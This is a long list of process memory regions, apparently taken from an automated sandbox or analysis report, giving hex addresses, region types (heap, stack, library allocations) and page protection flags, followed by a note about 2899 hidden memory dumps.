13EEF000
trusted library allocation
page read and write
85A20FE000
stack
page read and write
349D000
trusted library allocation
page read and write
2F3F000
trusted library allocation
page read and write
2B5D000
trusted library allocation
page read and write
A10000
heap
page read and write
6045000
heap
page read and write
1B1C4000
heap
page read and write
EFE4AFF000
stack
page read and write
3679000
trusted library allocation
page read and write
2787E377000
heap
page read and write
2EAC000
trusted library allocation
page read and write
7FF848E04000
trusted library allocation
page read and write
EB4000
trusted library allocation
page read and write
2E5B000
trusted library allocation
page read and write
F87000
stack
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
7FF848E1D000
trusted library allocation
page execute and read and write
7FF848DF0000
trusted library allocation
page read and write
3009000
trusted library allocation
page read and write
1375000
heap
page read and write
2F1A000
trusted library allocation
page read and write
14F0000
trusted library allocation
page read and write
1B1E8000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
13E8B890000
heap
page read and write
7FF848EA0000
trusted library allocation
page execute and read and write
2B7F000
trusted library allocation
page read and write
1B1DD000
heap
page read and write
352C000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
1EC383E0000
heap
page read and write
13E8D8B0000
heap
page read and write
2BED000
trusted library allocation
page read and write
21A2E884000
heap
page read and write
B9D5000
heap
page read and write
29A0A082000
trusted library allocation
page read and write
59F4E7B000
stack
page read and write
13941000
trusted library allocation
page read and write
2D71000
trusted library allocation
page read and write
13EA59F6000
heap
page read and write
2E63000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page read and write
15CD874D000
heap
page read and write
2D5E000
stack
page read and write
1A610000
trusted library allocation
page read and write
33AB000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
29A0A15D000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page execute and read and write
806B000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
29AB000
trusted library allocation
page read and write
3546000
trusted library allocation
page read and write
64C0DF7000
stack
page read and write
617C000
stack
page read and write
1B972000
heap
page read and write
5180000
trusted library allocation
page read and write
1040000
heap
page read and write
27EA000
trusted library allocation
page read and write
2D61000
trusted library allocation
page read and write
538E000
stack
page read and write
2A36000
trusted library allocation
page read and write
26A8000
trusted library allocation
page read and write
2F13000
trusted library allocation
page read and write
19131D9E000
heap
page read and write
2B56000
trusted library allocation
page read and write
7FF848FE4000
trusted library allocation
page read and write
CF4000
stack
page read and write
FB201DC000
stack
page read and write
A70000
heap
page read and write
2B0D000
trusted library allocation
page read and write
1B190000
heap
page read and write
7C0000
heap
page read and write
15CBE788000
heap
page read and write
7FF849060000
trusted library allocation
page read and write
125E1000
trusted library allocation
page read and write
144D000
trusted library allocation
page execute and read and write
CAFE000
stack
page read and write
1B60F000
stack
page read and write
5EAC000
stack
page read and write
7FF848E9C000
trusted library allocation
page execute and read and write
3CFDBFF000
stack
page read and write
1657A6D0000
heap
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
1D71E000
stack
page read and write
D853FFF000
stack
page read and write
2F7C000
trusted library allocation
page read and write
BE9000
stack
page read and write
2EF9000
trusted library allocation
page read and write
AD10000
heap
page read and write
1C01E000
stack
page read and write
19131D8A000
heap
page read and write
B86A000
heap
page read and write
B09A000
heap
page read and write
1568000
heap
page read and write
323E000
trusted library allocation
page read and write
1B5E0000
heap
page read and write
9A01FF000
stack
page read and write
D85534B000
stack
page read and write
2EDF000
trusted library allocation
page read and write
2F09000
trusted library allocation
page read and write
962E000
stack
page read and write
CD0000
heap
page read and write
3031000
trusted library allocation
page read and write
2F5D000
trusted library allocation
page read and write
62BE000
stack
page read and write
1B940000
heap
page read and write
D85447D000
stack
page read and write
2B9D000
trusted library allocation
page read and write
1B40E000
stack
page read and write
2F02000
trusted library allocation
page read and write
59F7000
heap
page read and write
2B9A000
trusted library allocation
page read and write
139FF000
trusted library allocation
page read and write
3279000
trusted library allocation
page read and write
7FF8490B0000
trusted library allocation
page read and write
1D12F000
stack
page read and write
1AE9D000
stack
page read and write
1BDBB000
stack
page read and write
4ED6000
trusted library allocation
page read and write
3625000
trusted library allocation
page read and write
274E000
trusted library allocation
page read and write
7FF849070000
trusted library allocation
page read and write
1472000
trusted library allocation
page read and write
1A8AC3C0000
heap
page read and write
2EB7000
trusted library allocation
page read and write
2F73000
trusted library allocation
page read and write
29EA000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
15CBE730000
heap
page read and write
2E95000
trusted library allocation
page read and write
F1C0000
heap
page read and write
128D000
heap
page read and write
2E7F000
trusted library allocation
page read and write
34A0000
trusted library allocation
page read and write
59F4EFF000
stack
page read and write
F07E000
stack
page read and write
7FF848E2D000
trusted library allocation
page execute and read and write
1D617000
stack
page read and write
1B50E000
stack
page read and write
31E8000
trusted library allocation
page read and write
1B010000
heap
page read and write
85A207F000
stack
page read and write
7FF849030000
trusted library allocation
page read and write
321B000
trusted library allocation
page read and write
15CBE989000
heap
page read and write
1FB68FE000
stack
page read and write
2BD458C0000
heap
page read and write
15CD86C0000
heap
page execute and read and write
5A64000
heap
page read and write
4EAE000
stack
page read and write
5F2E000
stack
page read and write
7FF849050000
trusted library allocation
page read and write
29A0A6DF000
trusted library allocation
page read and write
2F9B000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page execute and read and write
15CBE6C0000
heap
page read and write
34BC000
trusted library allocation
page read and write
B839000
heap
page read and write
1C6113E0000
heap
page read and write
2F65000
trusted library allocation
page read and write
1FB697E000
stack
page read and write
CD0D000
stack
page read and write
C7EB57E000
stack
page read and write
7FF848FE2000
trusted library allocation
page read and write
29A0ACC9000
trusted library allocation
page read and write
B48000
unkown
page execute and read and write
52FE000
trusted library allocation
page read and write
15CC0541000
trusted library allocation
page read and write
3130000
heap
page read and write
1BF0E000
stack
page read and write
3A4E27B000
stack
page read and write
602C000
stack
page read and write
27357780000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
261222D4000
heap
page read and write
2BAC000
stack
page read and write
28C0000
trusted library allocation
page read and write
4EF0000
trusted library allocation
page read and write
2F15000
trusted library allocation
page read and write
26AA000
trusted library allocation
page read and write
324A000
trusted library allocation
page read and write
12B7000
heap
page read and write
2CF7A36C000
heap
page read and write
AD00000
heap
page read and write
EA3E000
stack
page read and write
7FF8490A0000
trusted library allocation
page read and write
5A09000
heap
page read and write
796000
heap
page read and write
320E000
trusted library allocation
page read and write
2ACE000
stack
page read and write
7FF849152000
trusted library allocation
page read and write
2F12000
trusted library allocation
page read and write
29A07C60000
heap
page read and write
1C012000
heap
page read and write
1657A4B8000
heap
page read and write
13E8BBD4000
heap
page read and write
19131F30000
heap
page read and write
2F89000
trusted library allocation
page read and write
3480000
trusted library allocation
page read and write
254DB547000
heap
page read and write
7FF848E24000
trusted library allocation
page read and write
5BEE000
stack
page read and write
1BAEF000
stack
page read and write
7FF84901A000
trusted library allocation
page read and write
2D6D000
trusted library allocation
page read and write
29E5000
trusted library allocation
page read and write
1BE1E000
stack
page read and write
13C0000
heap
page read and write
7FF848DF9000
trusted library allocation
page read and write
15CC2187000
trusted library allocation
page read and write
14DE000
stack
page read and write
2E135500000
heap
page read and write
2B22000
trusted library allocation
page read and write
31EC000
trusted library allocation
page read and write
3212000
trusted library allocation
page read and write
2F2A000
trusted library allocation
page read and write
55B0000
trusted library allocation
page read and write
13A77000
trusted library allocation
page read and write
27A8000
trusted library allocation
page read and write
3686000
trusted library allocation
page read and write
7FF84900C000
trusted library allocation
page read and write
3281000
trusted library allocation
page read and write
AF50000
trusted library allocation
page read and write
347E000
trusted library allocation
page read and write
10A8000
heap
page read and write
5BF5000
heap
page read and write
34FB000
trusted library allocation
page read and write
EF7E000
stack
page read and write
7FF849020000
trusted library allocation
page read and write
2D30000
trusted library allocation
page read and write
33E3000
trusted library allocation
page read and write
29A096B0000
heap
page readonly
25A8000
trusted library allocation
page read and write
2E60000
heap
page read and write
31F4000
trusted library allocation
page read and write
34E6000
trusted library allocation
page read and write
7FF848E3D000
trusted library allocation
page execute and read and write
AF70000
heap
page read and write
35C6000
trusted library allocation
page read and write
1914C02A000
heap
page read and write
19143BD1000
trusted library allocation
page read and write
15CD8A4C000
heap
page read and write
29A09F78000
trusted library allocation
page read and write
F4FC000
stack
page read and write
3485000
trusted library allocation
page read and write
139C6000
trusted library allocation
page read and write
3287000
trusted library allocation
page read and write
7FF849080000
trusted library allocation
page read and write
36DA000
trusted library allocation
page read and write
CD10000
heap
page read and write
22FE000
stack
page read and write
7FF848DF0000
trusted library allocation
page read and write
3477000
trusted library allocation
page read and write
7FF848FC2000
trusted library allocation
page read and write
53F0000
heap
page execute and read and write
2DB0000
trusted library allocation
page read and write
31E0000
trusted library allocation
page read and write
13E8B99C000
heap
page read and write
7FF848EB0000
trusted library allocation
page execute and read and write
2E0C000
trusted library allocation
page read and write
F73C000
stack
page read and write
7FF8490B0000
trusted library allocation
page read and write
3137000
trusted library allocation
page read and write
2E69000
trusted library allocation
page read and write
D70000
heap
page read and write
1B9C4000
stack
page read and write
7FF848E9C000
trusted library allocation
page execute and read and write
1D5D6F70000
heap
page read and write
2E30000
trusted library allocation
page read and write
13F17000
trusted library allocation
page read and write
7FF848DFD000
trusted library allocation
page execute and read and write
13E8B950000
heap
page read and write
16C2A5B0000
heap
page read and write
29A07CB0000
heap
page read and write
3924A4B000
stack
page read and write
EB1C000
stack
page read and write
2AE2000
trusted library allocation
page read and write
254DB510000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
7FF848DE3000
trusted library allocation
page execute and read and write
7FF849043000
trusted library allocation
page read and write
27C5000
trusted library allocation
page read and write
2904000
trusted library allocation
page read and write
10AE000
heap
page read and write
3CFDAFF000
unkown
page read and write
7FF848E30000
trusted library allocation
page read and write
7F2C000
stack
page read and write
AE10000
trusted library allocation
page read and write
13E8D474000
heap
page read and write
E00000
heap
page read and write
9F7000
heap
page read and write
1AC9C010000
heap
page read and write
1D13A000
heap
page read and write
34B9000
trusted library allocation
page read and write
1BC21000
heap
page read and write
1C57BA1D000
heap
page read and write
3345000
trusted library allocation
page read and write
3039000
trusted library allocation
page read and write
5400000
trusted library allocation
page read and write
3A4E2FE000
stack
page read and write
7FF848E20000
trusted library allocation
page read and write
7FF848EB0000
trusted library allocation
page read and write
B200000
trusted library allocation
page execute and read and write
282C000
trusted library allocation
page read and write
604A000
heap
page read and write
29B4000
trusted library allocation
page read and write
B5B5000
heap
page read and write
7FF849150000
trusted library allocation
page read and write
2A0D000
trusted library allocation
page read and write
1B8CE000
stack
page read and write
3528000
trusted library allocation
page read and write
3530000
trusted library allocation
page read and write
350000
unkown
page readonly
33F6000
trusted library allocation
page read and write
15CBE762000
heap
page read and write
15CD05B4000
trusted library allocation
page read and write
29A222D0000
heap
page read and write
1BA32000
heap
page read and write
11A8000
heap
page read and write
720000
heap
page read and write
1CA30000
trusted library allocation
page read and write
2FB3000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page execute and read and write
7FF848F40000
trusted library allocation
page execute and read and write
ACCF000
trusted library allocation
page read and write
7FF8490BA000
trusted library allocation
page read and write
28B0000
heap
page read and write
1B1DB000
heap
page read and write
15CBE7E7000
heap
page read and write
260F000
trusted library allocation
page read and write
7FF848FC7000
trusted library allocation
page read and write
2E71000
trusted library allocation
page read and write
E70000
heap
page read and write
79EE000
stack
page read and write
AD50000
trusted library allocation
page execute and read and write
29A09D40000
heap
page execute and read and write
16C2A5A0000
heap
page read and write
516E000
stack
page read and write
7FF849073000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page read and write
1D1D8000
heap
page read and write
7FF848E24000
trusted library allocation
page read and write
1A8AC1E1000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
19134BD7000
trusted library allocation
page read and write
12919000
trusted library allocation
page read and write
7FF849020000
trusted library allocation
page read and write
3269000
trusted library allocation
page read and write
4C4E000
stack
page read and write
14B0000
trusted library allocation
page read and write
2C63000
trusted library allocation
page read and write
C97F000
stack
page read and write
15CBEA10000
heap
page execute and read and write
28D6000
trusted library allocation
page read and write
1AC9C015000
heap
page read and write
15CC1601000
trusted library allocation
page read and write
11CA000
heap
page read and write
14C0000
trusted library allocation
page read and write
3528000
trusted library allocation
page read and write
2CF8000
trusted library allocation
page read and write
2CBE0060000
heap
page read and write
15CD8A29000
heap
page read and write
7A2D000
stack
page read and write
1D39E000
stack
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
2BA4000
trusted library allocation
page read and write
30F0000
heap
page read and write
2F17000
trusted library allocation
page read and write
29A21D86000
heap
page read and write
13968000
trusted library allocation
page read and write
323B000
trusted library allocation
page read and write
11BE000
heap
page read and write
7FF848E4D000
trusted library allocation
page execute and read and write
262F000
trusted library allocation
page read and write
351F000
trusted library allocation
page read and write
3158000
trusted library allocation
page read and write
13A6F000
trusted library allocation
page read and write
2FA2000
trusted library allocation
page read and write
30000
unkown
page readonly
7FF848E14000
trusted library allocation
page read and write
2CF7A366000
heap
page read and write
9A0C4E000
stack
page read and write
19133C52000
trusted library allocation
page read and write
1E068AE0000
heap
page read and write
7FF848DE4000
trusted library allocation
page read and write
314B000
trusted library allocation
page read and write
3062000
trusted library allocation
page read and write
85A227F000
stack
page read and write
19134688000
trusted library allocation
page read and write
2CBDFEE0000
heap
page read and write
1914BFE1000
heap
page read and write
7FF8490F0000
trusted library allocation
page read and write
261208D8000
heap
page read and write
3244000
trusted library allocation
page read and write
13E8BBD0000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
13EC000
unkown
page read and write
7FF849140000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
33F0000
trusted library allocation
page read and write
B64627F000
stack
page read and write
3923BF8000
stack
page read and write
254DB825000
heap
page read and write
2E91000
trusted library allocation
page read and write
3491000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page execute and read and write
191352E1000
trusted library allocation
page read and write
2F67000
trusted library allocation
page read and write
2EEF000
trusted library allocation
page read and write
16C2A890000
heap
page read and write
EF2BF1F000
stack
page read and write
76C0000
trusted library allocation
page read and write
1D5D8B40000
heap
page read and write
15CD87A8000
heap
page read and write
29A0AE41000
trusted library allocation
page read and write
CCCC000
stack
page read and write
B060000
heap
page read and write
9A0CCE000
stack
page read and write
1386000
heap
page read and write
7FF849120000
trusted library allocation
page read and write
357E000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
2EDD000
trusted library allocation
page read and write
2F39000
trusted library allocation
page read and write
7FF848FD0000
trusted library allocation
page read and write
12945000
trusted library allocation
page read and write
29A09680000
trusted library allocation
page read and write
A1E2AFF000
stack
page read and write
1274000
heap
page read and write
3489000
trusted library allocation
page read and write
BEC000
unkown
page readonly
E6F000
stack
page read and write
AC91000
trusted library allocation
page read and write
1420000
heap
page read and write
28736768000
heap
page read and write
31AB000
trusted library allocation
page read and write
13C2000
heap
page read and write
3568000
trusted library allocation
page read and write
2924000
trusted library allocation
page read and write
117C000
stack
page read and write
3177000
trusted library allocation
page read and write
29A096C0000
trusted library allocation
page read and write
1913496B000
trusted library allocation
page read and write
13E8BB40000
heap
page readonly
32B5000
trusted library allocation
page read and write
2738000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
1BB4B000
stack
page read and write
2A4F000
stack
page read and write
805000
heap
page read and write
2E135639000
heap
page read and write
4F4A5FF000
stack
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
2917000
trusted library allocation
page read and write
59C9000
heap
page read and write
34E8000
trusted library allocation
page read and write
3041000
trusted library allocation
page read and write
7FF848F82000
trusted library allocation
page read and write
108E000
stack
page read and write
7FF848EE0000
trusted library allocation
page execute and read and write
7FF848EC0000
trusted library allocation
page execute and read and write
1BBEC000
heap
page read and write
3146000
trusted library allocation
page read and write
2695000
trusted library allocation
page read and write
2B84000
trusted library allocation
page read and write
2787E350000
heap
page read and write
7FF848E03000
trusted library allocation
page execute and read and write
7FF848EA0000
trusted library allocation
page execute and read and write
1BB20000
heap
page read and write
ACD5000
trusted library allocation
page read and write
2833000
trusted library allocation
page read and write
12AF000
stack
page read and write
1D8D0000
heap
page read and write
2F7F000
trusted library allocation
page read and write
2F93000
trusted library allocation
page read and write
15CBE75B000
heap
page read and write
7FF848FE0000
trusted library allocation
page execute and read and write
13E8B9D8000
heap
page read and write
1805FFF000
unkown
page read and write
1397E000
trusted library allocation
page read and write
1CF05ECE000
heap
page read and write
7FF849040000
trusted library allocation
page read and write
1A8AC1A0000
heap
page read and write
128C1000
trusted library allocation
page read and write
7FF848F06000
trusted library allocation
page execute and read and write
7FF848FF0000
trusted library allocation
page read and write
261E000
trusted library allocation
page read and write
254DB533000
heap
page read and write
1A88D000
stack
page read and write
337D000
trusted library allocation
page read and write
3704000
trusted library allocation
page read and write
5510000
heap
page read and write
4F4A4FF000
stack
page read and write
2E28000
trusted library allocation
page read and write
2884000
trusted library allocation
page read and write
3020000
trusted library allocation
page read and write
986C000
stack
page read and write
2680000
trusted library allocation
page read and write
214265B6000
heap
page read and write
E52000
heap
page read and write
B830000
heap
page read and write
2937000
trusted library allocation
page read and write
29A07CBC000
heap
page read and write
29A07CF4000
heap
page read and write
1BFC0000
heap
page read and write
3CFD7BC000
stack
page read and write
D98000
heap
page read and write
33D7000
trusted library allocation
page read and write
138C000
heap
page read and write
2B24000
trusted library allocation
page read and write
19131D4B000
heap
page read and write
13E8B9B0000
heap
page read and write
4F0000
heap
page read and write
7FF8490C5000
trusted library allocation
page read and write
7FF848DF3000
trusted library allocation
page read and write
B862000
heap
page read and write
33E7000
trusted library allocation
page read and write
D162000
trusted library allocation
page read and write
AEA2000
heap
page read and write
2F87000
trusted library allocation
page read and write
29A21F64000
heap
page read and write
AC0F000
trusted library allocation
page read and write
7FF849050000
trusted library allocation
page read and write
1B4D0000
heap
page read and write
1B5ED000
stack
page read and write
7FE000
heap
page read and write
13ADF000
trusted library allocation
page read and write
357F000
trusted library allocation
page read and write
2D55000
trusted library allocation
page read and write
7FF848FD4000
trusted library allocation
page read and write
2F1F000
trusted library allocation
page read and write
13E8B900000
heap
page read and write
1E068960000
heap
page read and write
1340000
heap
page read and write
139AD000
trusted library allocation
page read and write
1CA33000
trusted library allocation
page read and write
128F0970000
heap
page read and write
AE8B000
heap
page read and write
128F0B40000
heap
page read and write
2D79000
trusted library allocation
page read and write
2A18000
trusted library allocation
page read and write
55BF000
trusted library allocation
page read and write
21A2E450000
heap
page read and write
184000
stack
page read and write
10BA000
trusted library allocation
page execute and read and write
10A0000
heap
page read and write
E78E000
stack
page read and write
7FF849000000
trusted library allocation
page read and write
1530000
heap
page execute and read and write
2750000
trusted library allocation
page read and write
7FF848EA0000
trusted library allocation
page execute and read and write
19131DE7000
heap
page read and write
13E8D380000
trusted library allocation
page read and write
3246000
trusted library allocation
page read and write
2624000
trusted library allocation
page read and write
1477000
trusted library allocation
page execute and read and write
53E5000
trusted library allocation
page read and write
1BE0E000
stack
page read and write
1390000
heap
page execute and read and write
3284000
trusted library allocation
page read and write
AE70000
heap
page read and write
1548000
heap
page read and write
1470000
trusted library allocation
page read and write
29A21E3D000
heap
page read and write
2F85000
trusted library allocation
page read and write
7FF848E1B000
trusted library allocation
page execute and read and write
FF920000
trusted library allocation
page execute and read and write
64C127F000
stack
page read and write
142E000
unkown
page read and write
1657A4B0000
heap
page read and write
2E135636000
heap
page read and write
3258000
trusted library allocation
page read and write
B56B000
stack
page read and write
2E70000
heap
page execute and read and write
13141000
trusted library allocation
page read and write
1A8AC3B0000
heap
page read and write
AC7B000
trusted library allocation
page read and write
2CF0000
trusted library allocation
page execute and read and write
1B8EE000
stack
page read and write
AEF7000
heap
page read and write
3059000
trusted library allocation
page read and write
2BD43DB0000
heap
page read and write
7A0000
heap
page read and write
7FF848F00000
trusted library allocation
page execute and read and write
1FB5FEE000
stack
page read and write
19134BD0000
trusted library allocation
page read and write
EB0000
heap
page read and write
2E9E000
trusted library allocation
page read and write
C20000
heap
page read and write
4EE2000
trusted library allocation
page read and write
273577B4000
heap
page read and write
7FF848DE4000
trusted library allocation
page read and write
13E8B956000
heap
page read and write
7FF848DF4000
trusted library allocation
page read and write
CEFC000
stack
page read and write
32B3000
trusted library allocation
page read and write
15CC054B000
trusted library allocation
page read and write
7FF848E1B000
trusted library allocation
page execute and read and write
2F81000
trusted library allocation
page read and write
E8CE000
stack
page read and write
278A000
trusted library allocation
page read and write
25EC000
trusted library allocation
page read and write
3141000
trusted library allocation
page read and write
2C5F000
trusted library allocation
page read and write
1E043000
stack
page read and write
31B4000
trusted library allocation
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
2EA6000
trusted library allocation
page read and write
906E000
stack
page read and write
34FD000
trusted library allocation
page read and write
622D000
stack
page read and write
19133870000
heap
page execute and read and write
151C000
stack
page read and write
EDFE000
stack
page read and write
13E8B990000
heap
page read and write
1FB657D000
stack
page read and write
7FF849010000
trusted library allocation
page read and write
1B9A4000
heap
page read and write
2EFE000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
BE6000
unkown
page execute and read and write
19134186000
trusted library allocation
page read and write
3021000
trusted library allocation
page read and write
1D020000
heap
page read and write
15CC0FF3000
trusted library allocation
page read and write
3923DFE000
stack
page read and write
3923EFE000
stack
page read and write
10B0000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
AF5000
stack
page read and write
607E000
stack
page read and write
2A0E000
trusted library allocation
page read and write
29A09DD2000
trusted library allocation
page read and write
13EA5C66000
heap
page read and write
D85427E000
stack
page read and write
5AA0000
trusted library allocation
page read and write
CBEE000
stack
page read and write
7FF848F90000
trusted library allocation
page execute and read and write
2A07000
trusted library allocation
page read and write
7FF849075000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
13F9F000
trusted library allocation
page read and write
1B6F0000
heap
page read and write
313A000
trusted library allocation
page read and write
979000
stack
page read and write
1CA40000
trusted library section
page read and write
15CC0C4D000
trusted library allocation
page read and write
2CA9000
trusted library allocation
page read and write
34E3000
trusted library allocation
page read and write
1B5FC000
stack
page read and write
3429000
trusted library allocation
page read and write
AED4000
heap
page read and write
2699000
trusted library allocation
page read and write
5CA0000
heap
page read and write
A82000
heap
page read and write
329A000
trusted library allocation
page read and write
7FF849060000
trusted library allocation
page read and write
7FF849030000
trusted library allocation
page read and write
13EA5B00000
heap
page read and write
2EA9000
trusted library allocation
page read and write
15CD06F7000
trusted library allocation
page read and write
34DA000
trusted library allocation
page read and write
19131ED0000
trusted library allocation
page read and write
1FB63FF000
stack
page read and write
4F4A57E000
stack
page read and write
25BF000
trusted library allocation
page read and write
13FF7000
trusted library allocation
page read and write
13EF000
heap
page read and write
5A9A000
heap
page read and write
7FF848FB0000
trusted library allocation
page read and write
2FC1000
trusted library allocation
page read and write
30A9000
trusted library allocation
page read and write
BE9000
unkown
page execute and read and write
2BF0000
trusted library section
page read and write
25AC000
trusted library allocation
page read and write
A50000
heap
page read and write
1914BD8A000
heap
page read and write
64C10FF000
stack
page read and write
350A000
trusted library allocation
page read and write
2EA2000
trusted library allocation
page read and write
7FF849140000
trusted library allocation
page read and write
306E000
stack
page read and write
36D8000
trusted library allocation
page read and write
1DBDE000
stack
page read and write
2D5D000
trusted library allocation
page read and write
2F13000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
2D34000
trusted library allocation
page read and write
1BCA0000
heap
page read and write
1D8C0000
heap
page read and write
6190000
trusted library allocation
page read and write
8AEE000
stack
page read and write
1BBB4000
heap
page read and write
12DE000
stack
page read and write
1914BF50000
heap
page read and write
7FF848EAC000
trusted library allocation
page execute and read and write
2620000
trusted library allocation
page read and write
11A0000
heap
page read and write
12F5000
stack
page read and write
27AA000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
34B8000
trusted library allocation
page read and write
32C5000
trusted library allocation
page read and write
18060FF000
stack
page read and write
7FF848E3C000
trusted library allocation
page execute and read and write
F1E000
heap
page read and write
13071000
trusted library allocation
page read and write
29A0BAA8000
trusted library allocation
page read and write
7FF849042000
trusted library allocation
page read and write
1BD04000
heap
page read and write
13E8B95C000
heap
page read and write
12301000
trusted library allocation
page read and write
1B7AE000
stack
page read and write
31D6000
trusted library allocation
page read and write
2D91000
trusted library allocation
page read and write
1A8AC1AA000
heap
page read and write
1C57B9C0000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
EDD000
heap
page read and write
15CD8A42000
heap
page read and write
15CBE914000
trusted library allocation
page read and write
1B323000
heap
page read and write
30CC000
trusted library allocation
page read and write
7FF84903E000
trusted library allocation
page read and write
B822000
heap
page read and write
33CF000
trusted library allocation
page read and write
2CBDFF29000
heap
page read and write
13143000
trusted library allocation
page read and write
1EC383E4000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
1914C000000
heap
page read and write
34EC000
trusted library allocation
page read and write
8D2000
unkown
page execute and read and write
3923E7F000
stack
page read and write
1D517000
stack
page read and write
1D0000
heap
page read and write
1462000
trusted library allocation
page read and write
2F61000
trusted library allocation
page read and write
650D000
stack
page read and write
5C2D000
stack
page read and write
F1D0000
heap
page read and write
9D3A000
heap
page read and write
D8542FD000
stack
page read and write
976E000
stack
page read and write
337B000
trusted library allocation
page read and write
2F57000
trusted library allocation
page read and write
19131F35000
heap
page read and write
F50000
heap
page read and write
25F5000
trusted library allocation
page read and write
1B5C0000
heap
page execute and read and write
7FF848E23000
trusted library allocation
page execute and read and write
2CCE000
trusted library allocation
page read and write
7FF8490D0000
trusted library allocation
page read and write
C7EB67F000
stack
page read and write
7FF848FB1000
trusted library allocation
page read and write
1FB627F000
stack
page read and write
1A8AC1D0000
heap
page read and write
AE56000
heap
page read and write
1B1B3000
heap
page read and write
99FD7F000
stack
page read and write
3469000
trusted library allocation
page read and write
7FF848FA0000
trusted library allocation
page read and write
2BD43EA0000
heap
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
D85477E000
stack
page read and write
7FF848FBA000
trusted library allocation
page read and write
A6D000
heap
page read and write
13EA5BE0000
heap
page read and write
7FF849090000
trusted library allocation
page read and write
1D5D7110000
heap
page read and write
4415000
trusted library allocation
page read and write
392397D000
stack
page read and write
66C09FF000
unkown
page read and write
2F33000
trusted library allocation
page read and write
13F97000
trusted library allocation
page read and write
2EF1000
trusted library allocation
page read and write
15CD86F6000
heap
page execute and read and write
1C6FA000
stack
page read and write
7FF848FC4000
trusted library allocation
page read and write
7FF849100000
trusted library allocation
page read and write
29B9000
trusted library allocation
page read and write
EF2BE9D000
stack
page read and write
2F8F000
trusted library allocation
page read and write
2AD0000
heap
page execute and read and write
1A8AC2A0000
heap
page read and write
FA5000
heap
page read and write
5513000
heap
page read and write
3144000
trusted library allocation
page read and write
7FF848DED000
trusted library allocation
page execute and read and write
A80000
trusted library allocation
page read and write
1ABD0000
heap
page read and write
7CEC000
stack
page read and write
31DE000
trusted library allocation
page read and write
4EDD000
trusted library allocation
page read and write
7FF849040000
trusted library allocation
page read and write
E26000
heap
page read and write
1A7AAD30000
heap
page read and write
2EBB000
trusted library allocation
page read and write
7FF849120000
trusted library allocation
page read and write
2EF7000
trusted library allocation
page read and write
34DB000
trusted library allocation
page read and write
268B000
trusted library allocation
page read and write
D80F87E000
stack
page read and write
12303000
trusted library allocation
page read and write
5A1000
heap
page read and write
7FF8490E0000
trusted library allocation
page read and write
AE9A000
heap
page read and write
2C11000
trusted library allocation
page read and write
B1B0000
trusted library section
page readonly
2673000
trusted library allocation
page read and write
3335000
trusted library allocation
page read and write
C25000
heap
page read and write
15F0000
trusted library allocation
page read and write
7FF849160000
trusted library allocation
page read and write
29A09A52000
trusted library allocation
page read and write
3A4E37F000
stack
page read and write
1C030000
heap
page read and write
B645F0D000
stack
page read and write
7FF848DE3000
trusted library allocation
page execute and read and write
2BB4000
trusted library allocation
page read and write
25BB000
trusted library allocation
page read and write
1B4C3000
heap
page execute and read and write
1E068A80000
heap
page read and write
1370000
heap
page read and write
1BCF8000
heap
page read and write
EDF0000
trusted library allocation
page execute and read and write
B852000
heap
page read and write
1BCE2000
heap
page read and write
2A14000
trusted library allocation
page read and write
261208A0000
heap
page read and write
13E8B940000
trusted library allocation
page read and write
CBFE000
stack
page read and write
2ED3000
trusted library allocation
page read and write
3544000
trusted library allocation
page read and write
D72000
heap
page read and write
15CBEA5C000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
32A6000
trusted library allocation
page read and write
19143D87000
trusted library allocation
page read and write
29CD000
trusted library allocation
page read and write
1914BFF4000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
31F1000
trusted library allocation
page read and write
7FF848E04000
trusted library allocation
page read and write
There are 2899 hidden memdumps, click here to show them.